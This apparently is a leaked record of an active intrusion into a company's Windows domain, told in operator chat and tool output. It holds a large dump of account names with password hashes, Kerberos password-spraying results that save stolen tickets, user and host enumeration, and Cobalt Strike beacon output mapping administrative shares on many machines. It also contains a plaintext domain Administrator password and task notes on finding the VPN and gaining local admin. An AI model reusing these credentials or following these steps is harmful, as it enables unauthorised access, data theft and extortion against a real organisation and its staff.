4194 HQ148$ 2d55fbb28a582b77f3e49cf5e22a8972 4096
5842 KPNWH018$ 40e7ede02068c0c58d4898115bd81fa3 4096
5671 HQ235$ 7a11d9ed2b22f7ea11d6ccc0f2890a8d 4096
5943 MarieFabon c8bc2265426005ab7556a7bd85afea6d 66048
5669 HQ233$ 91892b5fd58897c1a686e1cd002c9238 4096
2112 HQ034$ 04c669c95c000c1361ee7b8f46b27e04 4096
5716 hqmac031$ a80bc5e01342a7487539f8e10940e842 4096
4239 HQ215$ cee70e744f18fd733844d8f83a9919ee 4096
6159 HQ275$ c0618f4f8cac792ac79f353423cd7db7 4096
5857 SHIPWORKS$ 8c1cde679f4219aafbffa1f99d0131a6 4096
4211 HQ177$ b05468a7a9daae868ebbda2c8590c622 4096
3768 HQ019$ 1e562edeae94f17e083f3c03f9587653 4096
5650 HQ228$ db27412310dae67c002a4aa88d45bec 4096
5758 HQ290$ 85ea06b1182f76be7ce5b96ea7f2b71f 4096
5885 MijiLee 8ac9585bea45991dc0ddc22fad131b67 66048
5852 MattShouse 0a1541b4648611c94f16712ce5e8a573 66048
6177 HQ302$ d9d6a328015f7f96ea3845aaef3f8052 4096
3897 HQ198$ f6e3cd706e32f7029f8ec3dd9f6a3678 4096
5933 missme$ 48ebc8b5e8dc978acffc0749e446437b 4096
5727 HQ265$ 07392311ff58205222e706dea27ba1b3 4096
5710 HQ257$ ceeac64261add7bb7e586805059a9f8c 4096
5828 KPNSR001$ df95d1dac933081941e9ccc5cadbc80f 4096
6186 KPNWH004$ d207e08d77344910ba45287ef7ea4660 4096
6134 HQ251$ f7d734e68493a49e1b51b465419a3b70 4096
3871 HQ181$ 6e3f9cc77d47e3f36f7207ead5bb89ec 4096
5782 HQ307$ 79f98fe4b328a13d32fe3c7b6762463f 4096
6120 HQ237$ 3334476f9723547be8246620fa2af30 4096
4249 hqmac005$ 694df55b012b70483e5f6aa4dd9dc055 4096
5757 HQ289$ 3d485df280e8afd4e07ce1905eccb927 4096
5979 hqmac072$ f12d0778a9d35f0c33a64f986b87b7c3 4096
4237 HQ210$ d051f928f646096b28a67df13c64ab50 4096
5889 JennySong f1eaf3801fb8d9a15c4fc93662711b22 66048
5967 HelenLee dec52846e9de22502810496416082e3c 66048
6137 HQ255$ 7e586c0b00b5bdccb6a0b022f84f0c32 4096
5987 HQ333$ e6f642d7ce10d539ef755f6d2f1a3ae8 4096
6162 HQ280$ bb61e601d0fe8ee8daa7588b355748a7 4096
5776 HQ305$ 8fe6178495cfb1f7e826c0f79abbe952 4096
4175 HQ131$ fd313cc9854784602017aa880cdfd97b 4096
6141 HQT007$ f461a726da4ba1a1e2ca267c889458a40 4096
6129 HQT004$ 5b41bcfc89e10d705b85f189aee9d249 4096
5682 HQT001$ f56c2969382ff9d2f15da32eab0610fb 4096
7124 HQT017$ bb502db77d89e3150fb941684bc2d630 4096
6200 HQT013$ d866a8207447ca9c0d5851be5e4fd26c 4096
5951 JiaeByun 392a6704b514051ee5fd925468c123e9 66048
5913 HQ317$ dc1a89ad80d719ec6252a13fd9066a2f 4096
5832 KPNSR005$ beea7ef7848f07b44d38444976d08681 4096
5994 HQ347$ 523f26291f886be54955163254657b56 4096
4190 HQ147$ a89f92de015f0bf9e903d3c6f38a3359 4096
5992 MimiLee a5dea1b541557ea63479fd6db79eb3bf 66048
5932 MeganKwon e8bcbeb2609fb5bc4cee0c320d5d14b2 66048
5977 RebeccaLee 16c4de54df6c370c3ee3ee3c26cab2f44 66048
6233 hqmac076$ 2cbb01b6820e6e33e4346798ff171d80 4096
5996 hqmac077$ 6e98824884610526e327076ced356e3d 4096
5911 IreneChoi fe50752bd5ea22a41a8aca01605e5818 66048
7112 hqmac60$ 37c647663187204ca7f6af033a4ed036 4096
5997 AllyHwang 28e2381b78cd1f750bfd502770aa6d63 66048
5957 YoungSeoYoun cb0f379ff689c2049efea57e82decec3c3 66048
5720 HQ262$ 88d23bb14ce9c662abc465ea5cb6d4bc 4096
5972 MiaLee 4cb72457d7aead4b390e798236ee9f8f 66048
6001 JoanneChang 60a1a91e44c2994c65f5ad08f867f8f9 66048
6002 HQ350$ 1bbbbc4e24fff56a27105eeb85490212 4096
5962 JayLee 47dc939c82aabe6185337b2075f56366 66048
6232 hqmac075$ 9afab07e095b165a85261b197ff375e1 4096
5831 KPNSR004$ 877ef1fdc9bf31e97b583bb73829d890 4096
5956 hqmac067$ cb55a0058fc2d2556ad5efc88cdb150c 4096
5998 JulieJKim 67ef8e3089d79c3cfc56363c0767846e 66050
5999 GiannaHan 764c1b2a51fecdf23656d7b78ac3838d 66050
1888 JoycePichay 7021809fae14591171379c87abe3a09c 66048
4250 hqmac011$ 05b519668e1bd5fdba45fc24cfadfc64 4096
5976 VioletLee 8d6750e6885239a28090f7555d4d7408 66048
6174 HQ297$ 0d4ab0d8287a13f71d8d1385ba5b2470 4096
5978 hqmac069$ 7a138280c7333ac88bf91e9e236f6e34 4096
6206 HQ318$ ebe67d5cb748c77171548325ce41713a 4096
6195 HQ311$ 438ab27716f6839ca1c4001a9d5c615f 4096
5973 JaneHwang 16d2605bfd8fd431b8ad3455a8876487 66048
5960 SolMoon 741782aa3c54acf9dcc035d345029f6b 66048
6151 HQ270$ c1844a03f37131cf2a55f28870d38db9 4096
5986 HQ328$ 7be6270a63cbfd874a61912318bab12d 4096
6169 HQ292$ da21c38e4767c6f2935dfc5c192bb72b 4096
6003 hqmac078$ 8bf9b916299ec7fbc4e9024bf4b74b0e 4096
5993 HQ346$ 9a6aa33c0326b29fc82e9f958235f69e 4096
5850 KatieLee $6fdf732687167ac4eae608f3f019b6ce 66048
5982 AshleyKim f7313c6b794f3e1411428727a8594cab 66048
5961 PatrickCho 065fcddae05a85a09856cef3e3b3ca3f 66048
6203 KPNWH020$ 5c75a458b5b4e4238a9e666bd5876824 4096
5859 TerryAhn 7ee9b86a12cf3605e1d616daeac5315f 66048
7120 hqmac073$ c91809bb9031755c78855f6afd64f5a2 4096
5969 DanaeHudspeth 44e0474ade49166e21cf2884c670fa5b 66048
3898 ChrisLee 5c1760eb00e981c4839d2b023053561b 66048
6148 COMMITCRM1$ 6aa3781e7d9d32e7213a877932790dff 4096
5830 KPNSR003$ 55f32f682cec5880ebc90bdf65024b41 4096
5984 JarymHerrera f87942fecf2a4a41081a2c18a36c6295 66048
6225 HQ326$ 250f987e5f174cf9f29f08f46ff4403d 4096
5774 GeorgeLiu c4d3b3ad003ab161f50c2687007e1146 66048
5963 HQ406$ 479fb7f5c9c21b7f0cd3d2db0e9696e8 4096
3854 HQ166$ 191d99af1939ea6362f545309d1c5ab2 4096
7127 HQ348$ 4342faf39aba45e849f09a9d9d4d269c 4096
5809 SHOWROOM 44764b991113fc2dd4da7beff159de1d 66048
6161 HQ279$ a717786a67bf0b6e1856eff7da9ae9dc 4096
7116 HQ338$ 707cfcbb448aa7c7eb7cfdb12a0dafc 4096
5922 SamanthaJ e1cc6ce0a064332108cae4e3284ba3a1 66048
5912 BrayanAldana 37dce76fa4c57293581e7a41a38a5401 66048
3754 SharonBong 37dce76fa4c57293581e7a41a38a5401 66048
5941 MelissaOlmos 37dce76fa4c57293581e7a41a38a5401 66048
5611 ClaudiaSantos 37dce76fa4c57293581e7a41a38a5401 66048
4238 MariaGonzales 37dce76fa4c57293581e7a41a38a5401 66048
1180 EloisaBelen 37dce76fa4c57293581e7a41a38a5401 66048
7118 hqmac071$ 5e57f6973e3b398ff0d3ef0734123c70 4096
3900 HQ201$ 66e7f9eeee0c0f6c64d841dcec8ba7dd53 4096
5919 HQ320$ bb8d89fd01d7473ba504e7fc55c0cdaa 4096
6224 hqmac068$ 9e2ed9c0efba90650132bc02ca5f94c1 4096
5946 JohnPichay$ f145353b69b79efc28b89f69ab39253b 66048
4212 HQ176$ bbbbaf61aeb9fb72243819676ab0caaa 4096
6226 HQ327$ 9a57f40423ee3add95c3da8ab3dff031 4096
5755 HQ287$ e958e88f563a69cb1991c8034177a1be 4096
5740 AriannaReyes c1c8b7bd9ff6cb0a3c0f23943701c8d4 66048
5753 DavidRomero 27b231b4cce49e80381b8a14bb607f70 66050
3878 AaronAustin ce11ad444873c39a4da68eab8dcfe051 66050
5948 YobannyCarrillo 83b6abbd4397691cf704f1649b65a4ec 66050
5950 ElenaCoronel 6bcf0ea16fcf3c7696f00df673d7845b 66048
5709 HQ256$ 863517aa1ea3c7fbe84ddf474748119a 4096
5654 VerenisseGuerra 2483b43c5931681a70c5e7a3e80da049 66048
5703 HQ249$ a6870af793b6ae9167f277362cb51471 4096
5824 LuisH 94afb219138c226cf0f024b1ad7511af 66048
5928 hqmac063$ deb31687054536e9b57630ac437511f8 4096
3648 TommyPham 88855d786540490e0ae98ce82e2540fb 66048
3647 TomNguyen ed63e8cbbff2a38ee7fdf900ff46c3b1 66048
5811 JiHong 37dce76fa4c57293581e7a41a38a5401 66048
1519 KhiemNguyen 0073dc4646f80cc53db9a45b670efac1 66048
4232 HQ202$ d80bdda8068dbe1122230619211ad84a 4096
5935 KarinnaCarrillo a79b387b3b68697aeb21d2a5b3e72bdf 66048
5990 HQT016$ b5e2e94d55afff5a4da3694fec2ed6dd 4096
3827 JohnSihn $ 223fa401514d210c4f7f478ca52c3af7 66048
6230 HQ340$ 1eee99c3fe36c904f5d9444b8aa4120f 4096
5781 EmmaKang b671b1ebd4d7c6ef0143b181a80014d8 66048
5688 HQT002$ 6e059c547894c88509902255220b569d 4096
5954 JuneLee 83a304ac699aac600415344c1fb86d50 66048
5841 hqmac050$ 620af5e72df8728e8272365f79afc2a0 4096
6130 hqmac028s-mac-p$ 83db12f343401ad62230c75aecd944c6 4096
3645 MikeKang 2c66a6dfc5d1c9ae81d518d6cac94c42 66048
4231 HQ200$ 30ba804494e4c1a6e3ef8957f16484bf 4096
3818 HQ150$ 552735f1c8390d3e0243a82b3d5ef503 4096
6175 HQ300$ ccddf13314a2ea3944fa5fe2d6938344 4096
6179 HQ303$ d8992b6961bf35d9039f6e3557fe097f 4096
4215 HQ182$ fde1ac53a781583e7204d872d1beaf29 4096
5614 HQ214$ 0331682c92919ad8b4d8d3b951847b98 4096
6207 HQ319$ c110a4d1ecec196bf92c2d6ae8f532aa 4096
6155 HQ273$ 50c55261802561c1c4f4e1aaff29a05e 4096
3914 HQ211$ f508c9ec5d35077e250e8d354eff63ae 4096
5952 marketingfs$ 74345d8b0eca80393973efca9cfc5fc0bc 4096
2623 NickKim 37dce76fa4c57293581e7a41a38a38a5401 66048
5995 HQ349$ 486f7b0494f1bfd065afd4d7783db1d 4096
5715 HQ259$ efa396b13862d06846f5ab7947a56f0a 4096
5677 FrontDesk 6b74b0f0e48512d9a79751c09d730561 66048
6170 HQ293$ 22a00f3430f1b7d05e3ba773f66bc9f0 4096
5655 KirstenSchunk 7d456c2ef878d5cb304b7668663e37a0 66048
5870 ServerAdmin2$ 16e192f6c5c6fec6ffecc970778d071c 4096
5871 MediaAdmin2$ 525e28ca7c04babe51c42890a1149e21 4096
3815 Support 5278ba05e0216f75691d352f5b784ede 66048
5991 HQT015$ c9c78e1b28b708cd1b4705a4cddadc1e 4096
3707 AndyKim 7798b8d7a39009e65953bb40c7d56ed9 66048
5892 SunnyHa f4e7caf58243e81e9a7d8d9124cf0207 66048
5937 YejinKoo 1cff0a01b617074ba9bfe3f53441b92e 66048
3907 AndyP 1bb77d3c5f72b908eb3804c07def1618 66048
6184 ServerAdmin$ 5822ac060c4a9bcd6ad7c21aa7e43423 4096
5795 MediaAdmin$ 83ee6c0d61bea61725fb5048f07fb96b 4096
6202 RCRV-FS$ ac29b1a0c484e31e5334f136d24ec0df 4096
5886 LilianaLopez b879b7cb4cbb09c723181b1b759a9499 66048
6222 HANNAH-HP$ 0bf72a7b5db2743686d9ffdb47cd20ee 4096
500 Administrator 525ac36bc21379f88c1e675a9ed17aa4 66048
5827 JenniferLee efa257a651ec633d84d1608ae7331a4d 66048
6217 HQ404$ 6a5d1a357f7010cc2f86bfda767da312 4096
5894 HQ316$ 84b9a36a6c277c44f512ec17f66fb38d 4096
7125 HQT018$ a2898fd77f9fddb5f7df207d7d98c62c 4096
4184 QB-SVR$ fd55b7d1ab285e4d63faceda43a5b733 4096
2103 YongCKim$ 1023c9be3dd03b565ef16dbf0dbdfb9a 66048
6209 HQ601$ a5f33b14626618c4a9835ccf346ef5ed 4096
5971 MiraryHerrera $6443cc2b5980541bb58601a31bb532e3 66048
6190 KPNWH015$ 0d04a07c8a49b9cde7cc0af23355db45 4096
7115 HQ329$ 2e1d0e1addc2612e3b17696b878e0693 4096
3839 CindyLy 241f8b9bed7ae8c896b5dcab7cc05174 66048
3759 HQ125$ 588e8afe2bac19c331f197e56d5186a3 4096
5988 HQ334$ 9261074ba683fe267b98077c139de12e 4096
6227 HQ330$ 5d2c866114bbf66f53e5213e6ea73a7a 4096
1151 PatriciaChoi dc19cc56a7cc71f38fb3470c605d7a97 66048
1748 FSalgado 8dbe6c368310428b2decccd068f4ac2c 66048
3803 ArnoldChoi 1e6915c4c446d5bdc1d074f1a3f7bfe2 66048
3887 HQ190$ bbc74eff78132e3804a9625a5c38e633 4096
6218 hqmac61$ 2774419f529cc5f39623f3e38c079c15 4096
5640 RocioReyes 77f938451cbee5e6adb3523fbe83d209 66048
1208 ElbertPak d0f7e7e0b6502f02c2bfff79056ea8ae 66048
5808 EdwardP 05bcd65ffd75d0a6bac27c211b29fcc3 66048
5812 RayKim 14e04863170204b9ed58f3f68cbe3eeb 66048
6201 HQT014$ 3b220da511f30e7d68e5433b1ae7c411 4096
6164 HQ282$ ab4de9e53a3b16a2bb908ddd1a065bd8 4096
5773 freddysantos b23e3089694f258622f1093c8ef90565 66048
5959 dnm-wh 8c805e63d0e3010b108c6e4762c5eb24 66048
5989 HQ335$ e595d488a08cf7b6559310fff298c20d 4096
6005 JulissaRamirez daa6e3dfb01abc97a09bfb209afa752b 66048
3795 DanaPark e2384df3a18e7f7dea93ae240918d698 66048
5797 ServerAdmin1$ 63678414af4d2be869fba9d3b0c1db77 4096
6185 MediaAdmin1$ 1d1d8f2c2d86caa2290be44f6b7b2dd8 4096
6116 UPS-FEDEX$ 0616cfd90b8b9ce132b24695f19ae2e2 4096
4187 MMSP-SVR$ 87977d3547221bd674d890cd763374c4 4096
6198 HQT011$ 7751e2a9baf15c156b4d17e35df21c33 4096
1242 AndyHuh $2029262f3731bcd3cb3bfdc65cbea656 66048
4173 HQ126$ 2b11a3bb042630eb175e0aa1e0c13c0e 4096
3906 SarahLee f1a4a411a749258a66cb98d2e843b7fd 66048
1184 KellyLee 309d0c06d02c3d1f38950b504ccc6089 66048
6211 HQ602$ 644751b0ed8ce95f3bf6430757a260f4 4096
5110 MM-DC1$ 26553c3f340329abb95592d3e0d7bec51 532480
7114 HQ325$ 18a601f9998fd7e573a97307eaacf919 4096
3859 MM-LIB$ e8e851fc91f5b09550ef3f823af80d38 4096
5764 JayRoberts$ ca0c0e91a43000944c3ec9e62edd251c 66048
6181 HQ306$ 01cc749e8af7e26a90a964f1095c0855 4096
5699 CelineNguyen 287e22b7def56c27f0c53164fdb00722 66048
5642 MM-DC2$ aa4c035cafc5ffb8612d883d7bc73aa3 532480
5759 Thomas f21e58ada2fe53f0457409cbe57f2174 66048
5744 HQ276$ 9eb34226a5813bfe1fdc5b4bd5083378 4096
3872 DianeTran 44dc3f1327d938875f205efc2c23284f 66048
1147 soohkim 41ba0ab5e2ac0824285ff0aac6130910 66048
5949 LauraChung 9b32b16ff20799564c57f1c98dff2524 66048
6197 HQ312$ c688e1ba7b13c7a45175c8469d1f3f89 4096
5663 HQ231$ e8ff86989cebc6358149c93d36c84814 4096
5958 DNM-WH$ 2c37d24237754b06084beaed562c833f 4096
6219 hqmac062$ ba22b48cf144630a1114d16b3050e197 4096
5983 JulieKim 3741a798f458dfc2d5b234fb42ff9173 66048
6210 HQ402$ e6dc4e1105c293f0896a51d629c0f1c1 4096
5783 KPN-FS$ 0a9945a61b5b99777846bfb315f4df32 4096
6183 MM-FS$ 89f8238b56f40b93e7b5fa4154ed5cac 4096
6216 HQ401$ 1745af25bb9f82a9470529f441506c9c 4096
6004 HQ352$ 6910db81331ea71fa15557aedf6d74ac 4096
5796 MCPC$ 5c532af7d098fe037268049e5d8c59f3 4096
1164 YounHKim 8b8ebb0eb3bbd00d544848638fb020eb 66048
5938 MM-DC3$ 4c515e93ca1e690a62d44a7998b54047 532480
7123 HQ343$ a7ef6ce0235047e7d268cd9102fc2529 4096
4244 JoanPark 7aa43a27415ccb9d76590690f51a1719 66048
5848 HQ308$ 78fdb7fe0d8b3cd7b780388a5db6e217 4096
6228 HQ331$ 36b12b8caf4005fa05281b5b16b4592c 4096
6229 H332$ 77bbe127fc5ed6d8789da8a323acbd4e 4096
7117 HQ337$ 3c52a7027ca5d3624fa229af953407c8 4096
6221 HQ405$ 9d4659bd94a56c84573fe8479ccdc4c7 4096
4251 HQ217$ 96243fb134b7e226293c82fbc161c1e0 4096
3641 MichaelLee 970e74a2676eeb2266923f7576ae117b 66048
5615 ErnestoMoreno e04273f3b5746cb1b3326dbfbca86ac2 66048
6234 HQ351$ 4f553e073e189afe720166707df130b7 4096
5667 brandonsantana ccccda3163fd1105e0ab85885e4750b3 66048
2377 ClaudiaM 15e69ae664ccbeb4c4e6ee737e32ec6e 66048
3616 JulieKang 57e030c6654985cda6706bca1d1875e3 66048
6118 HQ232$ c20f2ce2eb7ab572797ef2dab3e9e9b3 4096
7122 HQ342$ 8639910bc25999db8dbd830090a759ed 4096
7121 HQ341$ d490e89f419113f1a358f46718c8fcb5 4096
6220 HQ603$ ab000455c06b8c84c9ecd3ce2d673d4a 4096
5883 photostudio$ d6bf74d6249997a2da21e22a5f7713c5 4096
6167 HQ288$ a0591cead4829dfb7e9f2ac528329992 4096
6142 HQ266$ 94068730c46037dbfff0cfc464177896 4096
3698 ChristineCha b0b21cf400db4e1eb1e37f39bab659f9 66048
5767 HQ299$ d6e3060e2eb0d0ef6f34eb5132626977 4096
5766 HQ298$ 2d65d2bd6109067bb5397ccbedc2624d 4096
6231 HQ345$ 7e27942b86419b84b48e11d3f7727fbf 4096
7119 HQ339$ 9de3abad1d08b6dbb22bf7208e240454 4096
2250 LisaKim 5fe115116139af2f9c8997f052c924ed 66048
7126 hqmac074$ 25e5db2f84c3fa0e020cbd420cb3a7a9 4096
1143 StellaCho f2f1bb29e892c1bcc50dca5862740cd8 66048
7113 hqmac070$ 65b79d127724f7796a96167f256d285b 4096
5965 NatalieSanchez a5d4f7118b63436c727bd6f7b4093a40 66048
1241 JenniferSuk 8497dc374396f9197798df4997a106d1 66048
2551 LeahKoh 1490979b7d44da96cac220bd273cb924 66048
6173 HQ296$ 9b8edb20af349aefe879ebd4908d4e78 4096
5927 HQ403$ f336f7408f1b0c270896e4303e020578 4096
5805 KellyCho a247481db51c56b3f7933dfa00d048dc 66048
``No session?
for now yes, @tl1 will now see what can be run while@tl1 @tl2 We have all sessions down - help the second team? ``
[+] received output:
[+] STUPENDOUS => wendy:0204
[*] Saved TGT into wendy.kirbi

[+] received output:
[+] STUPENDOUS => tele:0484
[*] Saved TGT into tele.kirbi

[+] received output:
[+] STUPENDOUS => jen:1225
[*] Saved TGT into jen.kirbi

[+] received output:
[+] STUPENDOUS => FL1:1602
[*] Saved TGT into FL1.kirbi
[+] STUPENDOUS => FL2:1602
[*] Saved TGT into FL2.kirbi

[+] received output:
[+] STUPENDOUS => jody:3346
[*] Saved TGT into jody.kirbi

[+] received output:
[+] STUPENDOUS => Ted:4194
[*] Saved TGT into Ted.kirbi

[+] received output:
[+] STUPENDOUS => tony:4321
[*] Saved TGT into tony.kirbi

[+] received output:
[+] STUPENDOUS => rmg:4372
[*] Saved TGT into rmg.kirbi
``user9 gave out @user1 @user3 dedicates, still separately give out something useful or not ?
https://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02эхххх, none of the passwords worked (
  ```
 ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0

[+] Valid user => Administrator
[+] Valid user => telemkt
[+] Valid user => jen
[+] Valid user => barb
[+] Valid user => jody
[+] Valid user => wendy
[+] Valid user => jon
[+] Valid user => louis
[+] Valid user => frontdesk
[+] Valid user => linux
[+] Valid user => micro
[+] Valid user => tele
[+] Valid user => micro2
[+] Valid user => Spare

[+] received output:
[+] Valid user => Gretta
[+] Valid user => FL1
[+] Valid user => PAC
[+] Valid user => mtsi
[+] Valid user => Ted
[+] Valid user => srivera
[+] Valid user => mhorgan
[+] Valid user => rmg
[+] Valid user => zztest
[+] Valid user => louisold
[+] Valid user => tony
[+] Valid user => FL2
[-] Blocked/Disabled user => Guest
[-] Blocked/Disabled user => krbtgt

[-] Done: No credentials were discovered :'(

``````

 Server Name IP Address
 ----------- ----------
 2K12SERVER 192.168.168.10
 PPCCOMP 192.168.168.50
 SUE-PC 192.168.168.68
 COMPUTER-1 192.168.168.62
 TELEMARKET 192.168.168.62
 JODY-PC 192.168.168.56
 WENDY-PC 192.168.168.55
 JONM-PC 192.168.168.50
 DAN-HP 192.168.168.67
 FRONTDESK 192.168.168.54
 PKG-102 192.168.168.63
 PKG-100 192.168.168.240
 PKG-101 192.168.168.70
 TONY-PC 192.168.168.51

[+] received output:
 TELEMARKETING-H unknown
 TIMECLOCKSQL 192.168.168.15
 HP-TONY 172.16.200.1
 BARBARA-HP-2019 192.168.168.66
 SALES2-HP-2019 192.168.168.53
 SALES1-HP-2019 192.168.168.73
 TED-LAPTOP 192.168.168.71

``Write a brief report in general, what have you done here, what are you going to, what data obtained is a local admin too ?:space_invader:niVisitedvcm?)
old session is theresession is gone? and config, dai look around on their workstationsany VPN, you can look in the admin users who are in VPN / Remote groups or suchlike if they are there will be an additional task: find a VPN, not necessarily open all the pc in a row in the cob, you can through net use look fs, or under the token YES (accesses above)1.done.missme.comokaido arms by the way does not immediately get to the rest? have all the servers checked?
machines - 344
of them
servers - 10 (9 alive 1 unavailable)
vindexed armies - 256 (49 alive)
53 balls mashed
```5311```
Status Local Remote Network

-------------------------------------------------------------------------------
OK S:        \HQ352.MissMe.local\D$ Microsoft Windows Network
OK T:        \Hannah-HP.MissMe.local\EmailFS
                                                Microsoft Windows Network
OK U:        \H332.MissMe.local\D$ Microsoft Windows Network
Disconnected V: \\192.168.1.169\C$ Microsoft Windows Network
Disconnected W:        \192.168.1.209\C$ Microsoft Windows Network
Disconnected X:        \192.168.1.21\C$ Microsoft Windows Network
Disconnected Y:        \192.168.1.71$ Microsoft Windows Network
Disconnected Z:        \192.168.1.186$ Microsoft Windows Network

``````
-------------------------------------------------------------------------------
OK X:        \DNM-WH.MissMe.local\Users
                                                Microsoft Windows Network
OK Y:        \Hannah-HP.MissMe.local\B$
                                                Microsoft Windows Network
OK Z:        \HQ325.MissMe.local\J$ Microsoft Windows Network
The command completed successfully.


``````
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK O: \\HQ405.MissMe.local\Users
                                                Microsoft Windows Network
OK P:        \HQ405.MissMe.local\UPS Microsoft Windows Network
OK Q:        \HQ405.MissMe.local\Public
                                                Microsoft Windows Network
OK R:        \HQ405.MissMe.local\F$ Microsoft Windows Network
OK S:        \HQ405.MissMe.local\A$ Microsoft Windows Network
OK T:        \MMSP-SVR.MissMe.local\InstallCD
                                                {\MMSP-SVR MissMe local/InstallCD}Microsoft Windows Network
OK U:        \MMSP-SVR.MissMe.local\E$
                                                Microsoft Windows Network
OK V:        \HQ603.MissMe.local\E$ Microsoft Windows Network
OK W:        \HQ312.MissMe.local\D$ Microsoft Windows Network
Unavailable X:        \192.168.1.138\C$ Microsoft Windows Network
Unavailable Y:        \192.168.1.175\C$ Microsoft Windows Network
Unavailable Z:        \192.168.1.183\C$ Microsoft Windows Network
The command completed successfully.

``````
Status Local Remote Network

-------------------------------------------------------------------------------
OK Q:        \HQ325.MissMe.local\H$ Microsoft Windows Network
OK R:        \HQ325.MissMe.local\G$ Microsoft Windows Network
OK S:        \HQ325.MissMe.local\F$ Microsoft Windows Network
OK T:        \HQ325.MissMe.local\D$ Microsoft Windows Network
OK U:        \DNM-WH.MissMe.local\D$ Microsoft Windows Network
OK V:        \192.168.1.47\c$ Microsoft Windows Network
OK W:        \192.168.3.51\c$ Microsoft Windows Network
OK X:        \192.168.1.74\c$ Microsoft Windows Network
OK Y:        \192.168.1.35\c$ Microsoft Windows Network
OK Z:        \192.168.1.187\c$ Microsoft Windows Network
The command completed successfully.

``````
OK R:        \HQ316.MissMe.local\D$ Microsoft Windows Network
OK S:        \HQ601.MissMe.local\E$ Microsoft Windows Network
OK T:        \HQ288.MissMe.local\D$ Microsoft Windows Network
OK U:        \HQ402.MissMe.local\E$ Microsoft Windows Network
OK V:        \HQ602.MissMe.local\C$ Microsoft Windows Network
OK W:        \HQ231.MissMe.local\C$ Microsoft Windows Network
OK X:        \192.168.1.39\C$ Microsoft Windows Network
Disconnected Y:        \192.168.1.82$ Microsoft Windows Network
Disconnected Z:        \192.168.1.182$ Microsoft Windows Network

``````
\\{\HQ231.MissMe.local\C$ - Default share
\\MissMe.local\D$ - Default share
\\{\HQ345.MissMe.local\C$ - Default share
\\{\HQ602.MissMe.local\C$ - Default share
\\{\HQ402.MissMe.local\E$ - Default share
\\{\HQ402.MissMe.local\G$ - Default share
\\{\HQ402.MissMe.local\H$ - Default share
\\{\HQ288.MissMe.local\D$ - Default share
\\{\HQ266.MissMe.local\C$ - Default share
\\{\HQ601.MissMe.local\E$ - Default share
\\{\HQ316.MissMe.local\D$ - Default share
``````
\\{\Hannah-HP.MissMe.local\C$ - Default share
\\{\Hannah-HP.MissMe.local\EmailFS-
\HQ329.MissMe.local\C$ - Default share
\\HQ329.MissMe.local/D$ - Default share
\\KPNWH015.MissMe.local$ - Default share
\\HQ125.MissMe.local $ - Default share
\\{\H332.MissMe.local\C$ - Default share
\\{\H332.MissMe.local\D$ - Default share
\\{\HQ232.MissMe.local\C$ - Default share
\\{\HQ352.MissMe.local\C$ - Default share
\\{\HQ352.MissMe.local\D$ - Default share
\\{\HQ339.MissMe.local\C$ - Default share
\\{\HQ312.MissMe.local\C$ - Default share
\\{\HQ312.MissMe.local\D$ - Default share
\\{\HQ337.MissMe.local\C$ - Default share
\\{\HQ603.MissMe.local\C$ - Default share
\\{\HQ603.MissMe.local\E$ - Default share
\\MMSP-SVR.MissMe.local\C$ - Default share
\\MMSP-SVR.MissMe.local\E$ - Default share
\MMSP-SVR.MissMe.local\InstallCD -
\\{\HQ405.MissMe.local\A$ - Default share
\HQ405.MissMe.local\C$ - Default share
\\{\HQ405.MissMe.local\F$ - Default share
\HQ405.MissMe.local\Public -
\HQ405.MissMe.local/UPS -
\HQ405.MissMe.local\Users -
``````
\DNM-WH.MissMe.local\D$ - Default share
\DNM-WH.MissMe.local/Users -
\\{\HQ341.MissMe.local\C$ - Default share
\\{\HQ330.MissMe.local\C$ - Default share
\\{\HQ330.MissMe.local\D$ - Default share
\\{\HQ331.MissMe.local\C$ - Default share
\\{\HQ331.MissMe.local\D$ - Default share
\\{\HQ217.MissMe.local\C$ - Default share
\\{\HQ325.MissMe.local\C$ - Default share
\\{\HQ325.MissMe.local\D$ - Default share
\\{\HQ325.MissMe.local\F$ - Default share
\\{\HQ325.MissMe.local\G$ - Default share
\\{\HQ325.MissMe.local\H$ - Default share
\HQ325.MissMe.local\J$ - Default share
\\{\HQ276.MissMe.local\C$ - Default share
\\{\HQ342.MissMe.local\C$ - Default share
\\{\HQ401.MissMe.local\C$ - Default share
\\{\HQT018.MissMe.local\C$ - Default share
\\{\Hannah-HP.MissMe.local\B$ - Default share
``````
\\{\HQ334.MissMe.local\C$ - Default share
\\{\HQ298.MissMe.local\C$ - Default share
\\{\HQ308.MissMe.local\C$ - Default share
\\{\HQ299.MissMe.local\C$ - Default share
\\{\HQ404.MissMe.local\C$ - Default share
\HQ404.MissMe.local\CommitCRM -
\HQ404.MissMe.local/UPS_Shared -
\HQT014.MissMe.local\C$ - Default share
\\{\HQ403.MissMe.local\C$ - Default share
\\{\HQ403.MissMe.local\E$ - Default share
\\{\HQ343.MissMe.local\C$ - Default share
\\{\HQ351.MissMe.local\C$ - Default share
\\{\HQ126.MissMe.local\C$ - Default share
\\{\HQ282.MissMe.local\C$ - Default share
\\{\DNM-WH.MissMe.local\C$ - Default share
````MISSME\Administrator mcmiss07!`@user9
```
Pinging HQ404.MissMe.local [192.168.1.49] with 32 bytes of data:
Pinging HQ231.MissMe.local [192.168.1.84] with 32 bytes of data:
Pinging HQ403.MissMe.local [192.168.1.44] with 32 bytes of data:
Pinging HQ282.MissMe.local [192.168.1.134] with 32 bytes of data:
Pinging HANNAH-HP.MissMe.local [192.168.1.86] with 32 bytes of data:
Pinging DNM-WH.MissMe.local [192.168.1.124] with 32 bytes of data:
Pinging HQ325.MissMe.local [192.168.1.184] with 32 bytes of data:
Pinging HQ329.MissMe.local [192.168.1.16] with 32 bytes of data:
Pinging HQ330.MissMe.local [192.168.1.37] with 32 bytes of data:
Pinging HQ331.MissMe.local [192.168.1.54] with 32 bytes of data:
``@user8
```
Pinging HQ603.MissMe.local [192.168.1.186] with 32 bytes of data:
Pinging HQ401.MissMe.local [192.168.1.71] with 32 bytes of data:
Pinging MCPC.MissMe.local [192.168.1.21] with 32 bytes of data:
Pinging UPS-FEDEX.MissMe.local [192.168.1.209] with 32 bytes of data:
Pinging HQ232.MissMe.local [192.168.1.70] with 32 bytes of data:
